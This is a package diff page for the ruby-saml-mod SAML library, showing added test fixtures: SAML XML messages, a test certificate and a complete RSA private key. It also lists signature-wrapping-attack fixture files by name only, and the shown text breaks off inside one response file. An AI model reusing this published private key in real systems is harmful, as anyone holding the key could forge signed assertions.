RubyGems - ruby-saml-mod - Versions diffs - 0.1.30 → 0.2.0 - Mend

ruby-saml-mod 0.1.30 → 0.2.0

Files changed (34) hide show

checksums.yaml +4 -4
data/lib/onelogin/saml.rb +3 -2
data/lib/onelogin/saml/auth_request.rb +37 -43
data/lib/onelogin/saml/base_assertion.rb +159 -0
data/lib/onelogin/saml/logout_request.rb +44 -0
data/lib/onelogin/saml/logout_response.rb +24 -25
data/lib/onelogin/saml/response.rb +2 -4
data/lib/onelogin/saml/settings.rb +23 -17
data/spec/base_assertion_spec.rb +5 -0
data/spec/fixtures/logout_request.xml +11 -0
data/spec/fixtures/logout_response.xml +13 -0
data/spec/fixtures/test1-cert.pem +21 -0
data/spec/fixtures/test1-key.pem +15 -0
data/spec/fixtures/test1-response.xml +62 -0
data/spec/fixtures/test2-response.xml +70 -0
data/spec/fixtures/test3-response.xml +9 -0
data/spec/fixtures/test4-response.xml +57 -0
data/spec/fixtures/test5-response.xml +48 -0
data/spec/fixtures/test6-response.xml +9 -0
data/spec/fixtures/wrong-key.pem +15 -0
data/spec/fixtures/xml_signature_wrapping_attack_duplicate_ids.xml +11 -0
data/spec/fixtures/xml_signature_wrapping_attack_response_attributes.xml +45 -0
data/spec/fixtures/xml_signature_wrapping_attack_response_nameid.xml +44 -0
data/spec/logout_request_spec.rb +89 -0
data/spec/logout_response_spec.rb +76 -0
data/spec/meta_data_spec.rb +39 -0
data/spec/response_spec.rb +193 -0
data/spec/spec_helper.rb +33 -0
data/spec/support/test_server.rb +73 -0
metadata +77 -10
data/LICENSE +0 -19
data/README +0 -7
data/lib/onelogin/saml/log_out_request.rb +0 -54
data/ruby-saml-mod.gemspec +0 -33

data/spec/base_assertion_spec.rb ADDED Viewed

@@ -0,0 +1,5 @@
+require 'spec_helper'
+describe Onelogin::Saml::BaseAssertion do
+  # TODO: Finish Specs
+end

data/spec/fixtures/logout_request.xml ADDED Viewed

@@ -0,0 +1,11 @@
+<samlp:LogoutRequest
+  xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
+  xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
+  Version="2.0"
+  ID="_cbb63e9741259e3f1c98a1ae38ac5ac25889720b32"
+  Destination="http://saml.example.com:8080/opensso/SingleLogoutService"
+  IssueInstant="2008-06-03T12:59:57Z">
+  <saml:Issuer>http://saml.example.com:8080/opensso</saml:Issuer>
+  <saml:NameID>_6a171f538d4f733ae95eca74ce264cfb602808c850</saml:NameID>
+  <samlp:SessionIndex>_b976de57fcf0f707de297069f33a6b0248827d96a9</samlp:SessionIndex>
+</samlp:LogoutRequest>

data/spec/fixtures/logout_response.xml ADDED Viewed

@@ -0,0 +1,13 @@
+<samlp:LogoutResponse
+    xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
+    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
+    ID="_cbb63e9741259e3f1c98a1ae38ac5ac25889720b32" Version="2.0"
+    IssueInstant="2008-06-03T12:59:57Z"
+    Destination="http://saml.example.com:8080/opensso/SingleLogoutService"
+    InResponseTo="_72424ea37e28763e351189529639b9c2b150ff37e5">
+    <saml:Issuer>http://saml.example.com:8080/opensso</saml:Issuer>
+    <samlp:Status>
+        <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"> </samlp:StatusCode>
+        <samlp:StatusMessage>Successfully logged out from service</samlp:StatusMessage>
+    </samlp:Status>
+</samlp:LogoutResponse>

data/spec/fixtures/test1-cert.pem ADDED Viewed

@@ -0,0 +1,21 @@
+-----BEGIN CERTIFICATE-----
+MIIDYDCCAsmgAwIBAgIJAK4l0RpJVxtEMA0GCSqGSIb3DQEBBQUAMH4xCzAJBgNV
+BAYTAlVTMQswCQYDVQQIEwJVVDEMMAoGA1UEBxMDU0xDMRQwEgYDVQQKEwtJbnN0
+cnVjdHVyZTEMMAoGA1UECxMDT3BzMQwwCgYDVQQDEwNPcHMxIjAgBgkqhkiG9w0B
+CQEWE29wc0BpbnN0cnVjdHVyZS5jb20wHhcNMTExMTA1MTU0OTA4WhcNMTMxMTA0
+MTU0OTA4WjB+MQswCQYDVQQGEwJVUzELMAkGA1UECBMCVVQxDDAKBgNVBAcTA1NM
+QzEUMBIGA1UEChMLSW5zdHJ1Y3R1cmUxDDAKBgNVBAsTA09wczEMMAoGA1UEAxMD
+T3BzMSIwIAYJKoZIhvcNAQkBFhNvcHNAaW5zdHJ1Y3R1cmUuY29tMIGfMA0GCSqG
+SIb3DQEBAQUAA4GNADCBiQKBgQDNVWUJ89UARD2GBLow5+W1EW5LFgI2o4N0fAgJ
+EFV6KPbEokdWrzHlLmfaxdDyIK+QilQqdtg3hU96zIFp8Dk9xnxJNYo1iIzZllrA
++q95Dwf5sDTioD3IHF2GL0CO1BhA6FX1d3ZuAaIwCI7G4Dw1PjBaUzHr99S9iwBJ
+tHvD6QIDAQABo4HlMIHiMB0GA1UdDgQWBBTCgEaIGTcvWLIi26vv+hycCcYxBjCB
+sgYDVR0jBIGqMIGngBTCgEaIGTcvWLIi26vv+hycCcYxBqGBg6SBgDB+MQswCQYD
+VQQGEwJVUzELMAkGA1UECBMCVVQxDDAKBgNVBAcTA1NMQzEUMBIGA1UEChMLSW5z
+dHJ1Y3R1cmUxDDAKBgNVBAsTA09wczEMMAoGA1UEAxMDT3BzMSIwIAYJKoZIhvcN
+AQkBFhNvcHNAaW5zdHJ1Y3R1cmUuY29tggkAriXRGklXG0QwDAYDVR0TBAUwAwEB
+/zANBgkqhkiG9w0BAQUFAAOBgQBWmVrGPhzKeyz7vkMdSSJZPnZa/KP9sOMzJikm
+7S26qjMnPiqRavnEy1EkN21AEkyZ3HzqtHgaelvusuA95sdBBG/8EAhtN9y6i6j7
+hTMo2gYwdIW/oW74ZjnuzGoHZUba3yPxV6aFoBB+rh2n22PCbfM1lgSwVPhsXz4G
+3CcHYg==
+-----END CERTIFICATE-----

data/spec/fixtures/test1-key.pem ADDED Viewed

@@ -0,0 +1,15 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIICXQIBAAKBgQDNVWUJ89UARD2GBLow5+W1EW5LFgI2o4N0fAgJEFV6KPbEokdW
+rzHlLmfaxdDyIK+QilQqdtg3hU96zIFp8Dk9xnxJNYo1iIzZllrA+q95Dwf5sDTi
+oD3IHF2GL0CO1BhA6FX1d3ZuAaIwCI7G4Dw1PjBaUzHr99S9iwBJtHvD6QIDAQAB
+AoGBAIRISICh6o5yaCRn9T++lhkRsrmC40gqDW1E3rRgJoE91MSXO1hYI8/fFp81
+o8fpUNHQnCqDSAZ0xuB40cLbNTQzLS/z43Jf/LRVEF6EhAspv0iiN+M4NjWZKGaV
+f1dr7ByJgTzbawdUfI5we6YTeu2Titaynj0ujAzZV/UH0A71AkEA/gM+nEQoKu8M
+y2JgKfqjEfanMwFxvgdtz0xu1sLbpLh8ipQ1SvYpcsTIDTViOMT45uKE5Ov6zwla
+H2N5dJdhkwJBAM7wpuk3XX7+nHzYko2w5xm9C6858bqXhl37xJyyqeT5SCSa7+T0
+U91nZuumk3ZaTRdW5BCbcshX+Gyk/ZrOIhMCQBAxgMJRjgX+q2Aj62GBuvegM9SK
+mQe2TYfTpZVHYt1DbZ0gCa23t7i7Vs2Qw6w+0mdVtYcqjBi6zeYGX23RYMUCQCmf
+ohL6veWTVOqPrTquwG0e50DBiOudGrvArlVOYnnZ4jbqqyIEOvInoD357WM62pK9
+OXZVrgq6Fw/TR+dhWt0CQQCU2Aj4q96Uu8+NVUQ++cpi1hOJrlYzjMSu0BbEBGjb
+S1jxgEPxkHc8xZU2X3lr6FgjmlyLje3UaYRh870M1o3x
+-----END RSA PRIVATE KEY-----

data/spec/fixtures/test1-response.xml ADDED Viewed

@@ -0,0 +1,62 @@
+<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="s2ee2ea83c0fcd1d16786bd0d340b1c3e5f1eebb2c" InResponseTo="e034c5ecd6336dd02d1bf61214e6c76feb84ebe785" Version="2.0" IssueInstant="2011-11-05T15:51:58Z" Destination="http://saml.example.com:3000/saml_consume"><saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://saml.example.com:8080/opensso</saml:Issuer><samlp:Status xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
+<samlp:StatusCode  xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
+Value="urn:oasis:names:tc:SAML:2.0:status:Success">
+</samlp:StatusCode>
+</samlp:Status><saml:EncryptedAssertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"><xenc:EncryptedData xmlns:xenc="http://www.w3.org/2001/04/xmlenc#" Type="http://www.w3.org/2001/04/xmlenc#Element"><xenc:EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#aes128-cbc"/><ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><xenc:EncryptedKey><xenc:EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#rsa-1_5"/><xenc:CipherData><xenc:CipherValue>KBYo1dxMpfoQibz6itv/PSuYVDj0EmVx9vtIb6UqDD5aPEBFqxvnt4HKYIEuPpRPZm3dd03fMAnv
+DtkfrR9gWzUdZgTG1VvwqNKN4fBy7VyqyiLFid88iy6omCLDiRGM1OscSol6ieug43+G9rmi/AnK
+mKfEoGwdiZ+GI4F4FB4=</xenc:CipherValue></xenc:CipherData></xenc:EncryptedKey></ds:KeyInfo><xenc:CipherData><xenc:CipherValue>dZ5dwwjgL9ul4bS2KIsqb5eFABUPLVUiR0fOsdthXmaWYNl/efNfI0DCAC/kxy+N5Xq/9mYQy+Wq
+ef+nNAJY9B51JPAZ5CR572gRQ0QfhQumHYuTzjsegS4i2OZ4Ye84kG6dM7sy2+LO7bQfckYijEE/
+WZ/oVwgytSBif/F0E10Jw3fC9rjfDc6wZJVQo/nMjYk7dfAhx53ajNfBIfciFkJdeEQg6fycRQGh
+rAhlJZl4RkZ2uup1kefSwrFa3Ei5yhqmw3I37Lv82VKGpwgjUpyCGW/3/0a1Rv6ZtzNocgz/9goI
+AXsh48ea7h+G2zxRDoFlLevL4e2+3vyFAi0Sexr2VtOdg/S8+cjpcPXoBYu8LDN7xJommxTxGJg9
+u5Bu8CfzlibNSpE5kBL7KYn/uxZTPqOSlTKpPGgXKrTk0NQbAHQ96lrgNQUMK5b9a0zv6OXc+10U
+uVh7iLlhsHTyMjo47Go9hcl/2+Devnoi18KlLkf7lLdGYeuI3X/iWZbjr4T0RxP56rMNW315KyDV
+0cQGMPRFImSo/YQuIcyP1C9cpQ9TM46XIoZP49mr1InygoVryOk8XAQrrnd8W471UqvT9mWJjRbu
+2QVPTAm4Amj4EYTBSQDtBCATN8EeQPRQ9mYSNLCXebcBseI1X1u6lxbwQYOrBK01lFkEzwOmKoMf
+Ww11VOm+cp40K4oO+gDRmd+YS6Mi76KmJSW/B/engeC8rQsO99Epek6zjTx1k+AA8HOdcebzDwsY
+BvtZOjOrWVqbgEJ4v1RSQtsoUbopNuMg0kRRB9EtJRPJzilHe1m73oi/njoArcV8bpEGxWqqK7bJ
+6nmASpMBOeaBm2Jk64Uf6IEX1n9ju7mm6ApYVW94s8aljIe4LftDRqIVhE+lpN7oMul9RE8UQxah
+2CMhOfLkjlx76BVV4PAId54dfSWpM4xrY+QMULgxi75BISIClNRcYsI3eyQbM9DSe0HYcBXszCLA
+EjF84408vrvTuLRhwALWBVcWytqcknzdX36XjJBxkpPDi5xP+SPayhRAg7/V3MEQQ32ShJhkcT2L
+8HTmHKTMgVp+piR16v6fKKXynCicQqK1aGzJUWrnpi6aYwcipNKf0CVQEk9NQFo2YSQUBnm7DG3T
+QoDQC0XSy5Q39u4YjZCA/3XfuSh5p2PbcV8vNY8Nh3EihLnutRKgqFT8lPPkSpNGwjk4bWA69GfD
+aucFTzWy8jQffGGQlSagq9SBQoQh3ixVcbNB2eu457V+7d7SglwrLGsD0WgbyCC1E5kV5/D2QTIl
+W1mlQM1w59M18uHUe+hLElQs0/snL5GFmN8HRk5PNLoDaR9SK9t7dkRjQxp4p68ELvA6gbZjk4ws
+/wW03IZE7Zqw/A6wlZBMinn8xKUiPoHTvISYOO4+4N1t9PmS3reSv5PY9bKoX840ZvoTobBZ+jR0
+mZ6ChjjfXgzs9WdxcAtWyqX8sQU88t7Sa1+GhAzjVZzgb+QSnKfqbdfw9sUIBz8w40A3pSGDKG+l
+YEEJbV2EhxhiFue6SA9hewGzSEODKfBZB8uFe9YQoV+nxa4Cs+BJD4Q86R+iKmP/aJkWnX50vcwQ
+Z33RSMUCqINjD4F9ykmBUZGq04p9xbQWSr3LUYrUO31mqCyMUAeYZQON4gFnI19UwUTi/SviLPnx
+qxcACnJbPDc2inrEGCJc8C7ZEWUgl2bUFbuRhBtsh6aNs5t/QBFUYISTwcjDXFuH1oTSKJVINZ7G
+DeQXe1rhyROa3RNRxZz+0Ffq5ZkjsUEYlyhpqawBgjn90juoAFZsdf+fOwkeZIKVWwCtQqHLGJaC
+SFdaytxlMgia3Qo0eIUEjXdEYJAsEflUGLJoJ/70LfI1XkuhkMc5ANlljrPvd6VSieHjALwNhtNd
+jxmifJVYBhHRleDOUljnCizRANEZSOEOig37j2oi8QrES+e0TJ/Mi3OTJ1vkJ/WaGn9QLB8hBQAR
+K0/gw99rQZIy+VEwv/PQUZv1lxgBME1UEUlG0OrOnKKuAUZOqaLay/epNmN4alBGfrPgBLXTSCtX
+M0/7hdivsStdHJm7MXmicu9iCNrlQRCFEQJC8OcvPboxi75tOS1VjULRmBdnxDdZIIDKmE9CyESS
+31XErIf69tQPxtIMqUkCL3iiuZdeVpkt+OR5xr0AE9RG9QVaJ0yY6Wu+5ozX0qRLfuftE+oH8D5B
+7xQ5hpYyte4+9j01ROyaF3cS+Kyaeea3iBBu8XC8I7A5qzpGZ9j6c1+UayguHIdAFAUM27lJfxGG
+FbiBlnafKPaE6Xd/KOqQti9zBsZyR15s2drLtLAeeicoKIWp8p9ohsPJVP33Y3B1HtjPZGddefan
+piyq2NLfjzEs+DMDs4m3vdQLV9GT0xZFmcp+GY1oohrFnYRXXxJqmDaO2e1jUX3s1JFwep4WqbSV
+o1Um4T2TjCXfgOnLlBruqgmSsiw2eaOFQRvwHo5OfgErHn2YRUUceeSLk8CLNqOxTwTF/tILjEWl
+m3TpIpNP7glpk48bYYddIMSbtbezkjFDZ1HF6Bsd/mkGJ8dTOzEXr0NfjKbxm7tB/AhVJfHu8MX2
+7USvkZctMMh01xqcSwYpc/qWmselDJMAObyyjSFTNSfIfVbWutyBKpmaav89zwLzP4O78/02Hfmj
+F2+5QndnZm1wFT3g+DOYm1B3L820r0bCfECna3MsqH5wChnmrbwz4QLMqMav7gj3otLRUcFmu8zQ
+kEkKB4DO/a5dZxlsAYO0bfI4LTNCvfdPuOeVTNOeKHPhYBlNxJgiFzPVb9m8qcvBqEJnU1wXZxz8
+9EXl8/6GBTQn6YWvdGKQBL67kDFF6sHWrZoVK17JGFUqdhK6KDJiXXCl2rKDQ1rEVRu0pWsJFkcC
+riidMp58jHkcSM8modpputvsokLnbi9H6kpUxStRVnTKuIDisA/u+0FNxTbQU4FfZZITQEb0np7f
+OZ1l0/TuVvYBppPDgYJ/WvaRcA1xd4ynv7ytU/GLzXglc7AoQ6wKAPQSZEzZo6CUl0UFBw3l/sj7
+dXSU47ArQxwlruEOp3F29gpSXMHI5+ZNZUPQ2Gulo3oB5fHL1CPFy7pnY+3yvl5GMaWqmH1A2dce
+xXmjSoTevt01W4pxQxdfzYTWiBxgb5S3feJEaJiYPUuEhMspMfvkInbtCU9DgGh8Zz+ifJVUUsgC
+IGY4y9UJgeHeN0W8rwk/y71u7k3LKlC3iH+UDG/di5wTQTNbnlZ+V/naJgmwkBIh5njT7f2qiI/1
+efpbiRidfLP8jO+hsV2835mvw/2eftd7V/9jCeXWxRjDnupnBNnRkRrTfhP06Gn35XBb77It0roj
+i2VdXOBsiEuchCX3TYgXmrW+dLWVjRKjPrqtAfcvWCHDHEuth2hXCnzxN/9gXq0WnQRc7jnn2btu
+IXtYbcy2z6SUuNZsrX4+uWm2p570YvrELmV6hzA8siECIpQxtxQ8FDoctD5xxMYQIiOBX8WmQBgA
+Hfg8+tg7e9qwO/TA4qw8vhuKzsnVGdYFcLImwALCLmM9OxHhlSBmoILlkYjoXv3AwX/f2MlSAJE4
+/iX0YnPWvMVWihBhPItcr7XxLTmCTHYlaMkvNhvnOOI1mUq8qdLtwAfGD4xT8y3Qlvrm5rrANVQO
+yUXG84tdensPKyb8Pyyf+T3fjbqbd9aOn14Ccm1EkrV7Pszt+kxscktVXvNipKeYiX+7c31UanlT
+GIT4kvhBCn7BfEpoF5aZlN4TJJcpCZc3F104uunBR6M3o8MeELlDT10Lz14I3n69tCCD4uR/HGNb
+RYujvW1xdCWA58I3zSPJCknaD1ltyzVgTEpMeeYuP6F59q+5CIz3+inJ59sZXbN16uM79BxUarGE
+vH6rpDDpiVrhXESpPDQzEYv2sWsDFtSfLP8/dfd3V8dbN+SxNWwCf9WLCNkzj8WXXlFrcnEXCgyO
+/j0Vr+niBXS1ZV3rEZCJgA+0odn6D6Z33yCyTz23juWEXEpyadwMtsJvcqF1C1OFIwBFH75BjYjG
+DulIkbWy26oZ0C6IVlADS+C1W2h2roIydoiG2VGvVhniT6r9pGbHqtCLz9ikvVRPQ2PvS+xXuImf
+fZL5hhY+2r20GJPIa8DyKhc+hufFRvO5A9JKIvzDVMXaXxYXpvD+uXCA8SO9/o63hTNkOb0kWv1S
+BvoCg4vRGxnjq4Lr2Zx5XmU=</xenc:CipherValue></xenc:CipherData></xenc:EncryptedData></saml:EncryptedAssertion></samlp:Response>

data/spec/fixtures/test2-response.xml ADDED Viewed

@@ -0,0 +1,70 @@
+<?xml version="1.0"?>
+<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" Version="2.0" ID="s2ee2ea83c0fcd1d16786bd0d340b1c3e5f1eebb2c" InResponseTo="e034c5ecd6336dd02d1bf61214e6c76feb84ebe785" Destination="http://saml.example.com:3000/saml_consume" IssueInstant="2011-11-05T15:51:58Z">
+  <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://saml.example.com:8080/opensso</saml:Issuer>
+  <saml2p:Status xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol">
+    <saml2p:StatusCode xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" Value="urn:oasis:names:tc:SAML:2.0:status:Success"></saml2p:StatusCode>
+  </saml2p:Status>
+  <saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" Version="2.0" ID="s27f24c1d5b86a127f91bbd226052477719a59f2eb" IssueInstant="2011-11-05T15:51:58Z">
+    <saml:Issuer>http://saml.example.com:8080/opensso</saml:Issuer>
+    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+      <ds:SignedInfo>
+        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
+        <ds:Reference URI="#s27f24c1d5b86a127f91bbd226052477719a59f2eb">
+          <ds:Transforms>
+            <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
+            <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+          </ds:Transforms>
+          <ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>
+          <ds:DigestValue>eMQal6uuWKMbUMbOwBfrFH90bzE=</ds:DigestValue>
+        </ds:Reference>
+      </ds:SignedInfo>
+      <ds:SignatureValue>
+VK6lHdEHFXiNHZvVyI4MeyVwfqGJNwqmUql9+W5Pygt+uffZU04/yuocEytDipkkyh7eKaq3feon
+858tAt3CKj2byghuG8crrGEzKSawmxaFz0HYWcGIhMwtceeDmoBQZzAn77DV7JytyPkTTvlvTTC5
+BT+2wAss0V5O1rjFGHw=
+</ds:SignatureValue>
+      <ds:KeyInfo>
+        <ds:X509Data>
+          <ds:X509Certificate>
+MIICQDCCAakCBEeNB0swDQYJKoZIhvcNAQEEBQAwZzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNh
+bGlmb3JuaWExFDASBgNVBAcTC1NhbnRhIENsYXJhMQwwCgYDVQQKEwNTdW4xEDAOBgNVBAsTB09w
+ZW5TU08xDTALBgNVBAMTBHRlc3QwHhcNMDgwMTE1MTkxOTM5WhcNMTgwMTEyMTkxOTM5WjBnMQsw
+CQYDVQQGEwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTEUMBIGA1UEBxMLU2FudGEgQ2xhcmExDDAK
+BgNVBAoTA1N1bjEQMA4GA1UECxMHT3BlblNTTzENMAsGA1UEAxMEdGVzdDCBnzANBgkqhkiG9w0B
+AQEFAAOBjQAwgYkCgYEArSQc/U75GB2AtKhbGS5piiLkmJzqEsp64rDxbMJ+xDrye0EN/q1U5Of+
+RkDsaN/igkAvV1cuXEgTL6RlafFPcUX7QxDhZBhsYF9pbwtMzi4A4su9hnxIhURebGEmxKW9qJNY
+Js0Vo5+IgjxuEWnjnnVgHTs1+mq5QYTA7E6ZyL8CAwEAATANBgkqhkiG9w0BAQQFAAOBgQB3Pw/U
+QzPKTPTYi9upbFXlrAKMwtFf2OW4yvGWWvlcwcNSZJmTJ8ARvVYOMEVNbsT4OFcfu2/PeYoAdiDA
+cGy/F2Zuj8XJJpuQRSE6PtQqBuDEHjjmOQJ0rV/r8mO1ZCtHRhpZ5zYRjhRC9eCbjx9VrFax0JDC
+/FfwWigmrW0Y0Q==
+</ds:X509Certificate>
+        </ds:X509Data>
+      </ds:KeyInfo>
+    </ds:Signature>
+    <saml:Subject>
+      <saml:NameID NameQualifier="http://saml.example.com:8080/opensso" Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">zach@example.com</saml:NameID>
+      <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
+        <saml:SubjectConfirmationData InResponseTo="e034c5ecd6336dd02d1bf61214e6c76feb84ebe785" NotOnOrAfter="2011-11-05T16:01:58Z" Recipient="http://saml.example.com:3000/saml_consume"/>
+      </saml:SubjectConfirmation>
+    </saml:Subject>
+    <saml:Conditions NotOnOrAfter="2011-11-05T16:01:58Z" NotBefore="2011-11-05T15:41:58Z">
+      <saml:AudienceRestriction>
+        <saml:Audience>http://saml.example.com/saml2</saml:Audience>
+      </saml:AudienceRestriction>
+    </saml:Conditions>
+    <saml:AuthnStatement SessionIndex="s2c57ee92b5ca08e93d751987d591c58acc68d2501" AuthnInstant="2011-11-05T15:51:58Z">
+      <saml:AuthnContext>
+        <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
+      </saml:AuthnContext>
+    </saml:AuthnStatement>
+    <saml:AttributeStatement>
+      <saml:Attribute FriendlyName="eduPersonAffiliation" Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.1" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+        <saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">member</saml:AttributeValue>
+      </saml:Attribute>
+      <saml:Attribute FriendlyName="eduPersonPrincipalName" Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.6" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+        <saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">user@example.edu</saml:AttributeValue>
+      </saml:Attribute>
+    </saml:AttributeStatement>
+  </saml:Assertion>
+</saml2p:Response>

data/spec/fixtures/test3-response.xml ADDED Viewed

@@ -0,0 +1,9 @@
+<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_32f10e8e465fcef72368e220faeb81db4c72f0c687" Version="2.0" IssueInstant="2012-08-03T20:07:15Z" Destination="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+  <ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+    <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
+  <ds:Reference URI="#_32f10e8e465fcef72368e220faeb81db4c72f0c687"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>S6Ne11nB7g1OyQAGYrFEOnu5QAQ=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>mgqZUiA3matrj6Zy4Dl+1ghsgoOl8wPH2mrFM9PAqrYB0skuJUZhYUkCegEbEX9WROEhoZ2bgwJQqeUPyX7leMPe7SSdUDNKf9kiuvpcCYZs1lFSEd51Ec8f+HvejmHUJAU+JIRWpp1VkYUZATihwjGLok3NGi/ygoajNh42vZ4=</ds:SignatureValue>
+<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status><saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="_6212b7e8c069d0f948c8648991d357addc4095a82f" Version="2.0" IssueInstant="2012-08-03T20:07:15Z"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+  <ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+    <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
+  <ds:Reference URI="#_6212b7e8c069d0f948c8648991d357addc4095a82f"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>kaZN1+moS328pr2zn8SKUML1ElI=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>1kUEkG33ZGQMf/1H1gzqBOhT5N2I35vM04Jp67xVjnZXF54AqPq1ZaM+Wjgx++AjEbL7ksaYuM3JSyK7GlZ77VmzpLsMqn4eM00K7Y+CeZy5LB24vcngXPxBk6BdUYkVk0vOsUfAAZ+mRX/zzBW7Z4C7qbjNGhAAJgi13JoBWpU=</ds:SignatureValue>
